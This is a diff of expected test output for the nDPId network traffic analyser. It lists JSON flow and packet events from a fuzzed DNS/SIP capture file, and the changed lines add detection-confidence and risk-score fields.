+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":577,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470899861,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899862,"flow_last_seen":1120470899862,"flow_idle_time":180000,"flow_min_l4_payload_len":1076,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":1076,"midstream":0,"ts_msec":1120470899862,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":17860,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01885{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1120470899862,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"ts_msec":1120470899862,"pkt":"ADBUADRWAODtAW6\/CABFAARQa9cAAIAREwbAqAEC1PIhIxPERcQEPH6wSU5WSVRFIHNpeDowMDk3MjM5Mjg3MDQ0QHNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ek\/oRzRiS25wMjAyMzgyNzWqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899865,"flow_last_seen":1120470899865,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470899865,"l3_proto":"ip4","src_ip":"192.170.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1120470899865,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470899865,"pkt":"ADBUADRWAODtAW69CABFAABIa9gAAIARS3nAqgECwKgBAQr6ADUANDnJ8AEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrd0YhAAE="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899865,"flow_last_seen":1120470899865,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470899865,"l3_proto":"ip4","src_ip":"192.170.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899865,"flow_last_seen":1120470899865,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470899865,"l3_proto":"ip4","src_ip":"192.170.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470900860,"flow_last_seen":1120470900860,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470900860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1120470900860,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470900860,"pkt":"ADBUADRWAODtAW69CABFAABIa9oAAIARS3fAqAECwKgBAQr6ADUANDnU8AEBAAABAAAAAAAABF9zaXAEX3VkcQNzaXAJTXliZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470900860,"flow_last_seen":1120470900860,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470900860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udq.sip.mybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470900860,"flow_last_seen":1120470900860,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470900860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udq.sip.mybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":2,"flow_last_seen":1120470902863,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470902863,"pkt":"ADBUADRWAODtAW69CABFAABIa9sAAIARS3bAqAECwKgBAQr6ADUANDnJ8AEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAheQE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":584,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470900860,"flow_last_seen":1120470902863,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470902863,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":584,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470900860,"flow_last_seen":1120470902863,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470902863,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":3,"flow_last_seen":1120470904866,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470904866,"pkt":"ADBUADRWAODtAW69CABFAABIa9wAAIARS3XAqAECwKgBAQr6ADUANDnJ8AEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJTnliZXJjaXR5AmRrAAAhAAE="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":587,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470900860,"flow_last_seen":1120470904866,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470904866,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.nybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":587,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470900860,"flow_last_seen":1120470904866,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470904866,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.nybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470908872,"flow_last_seen":1120470908872,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"128.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1120470908872,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470908872,"pkt":"ADBUADRWAODtAW69CABFAABIa90AAIARS3SAqAECwKgBAQr6ADUANDnJ8AEBAIgBAAAAABAABF9zaXAEX3VkcANzaXAJY3liZXNjaXR5AmRrAAAhAAE="}
 00567{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470301328,"flow_last_seen":1120470301328,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":127,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00552{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470301328,"flow_last_seen":1120470301328,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":127,"flow_datalink":1,"flow_max_packets":3}
-00624{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470721915,"flow_last_seen":1120470721915,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":394,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470721915,"flow_last_seen":1120470721915,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":394,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470721915,"flow_last_seen":1120470721915,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":394,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00582{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00658{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470814334,"flow_last_seen":1120470817390,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1120470916873,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470916873,"pkt":"ADBUADRWAODtAW69CABFAABEa94AAIARS3fAqAECwKgBAQr7ADUAMMzBWAIAAAABqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470916875,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1120470916875,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470916875,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqOkBwKgBAgA1CvsAR689eAKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470916875,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470916875,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
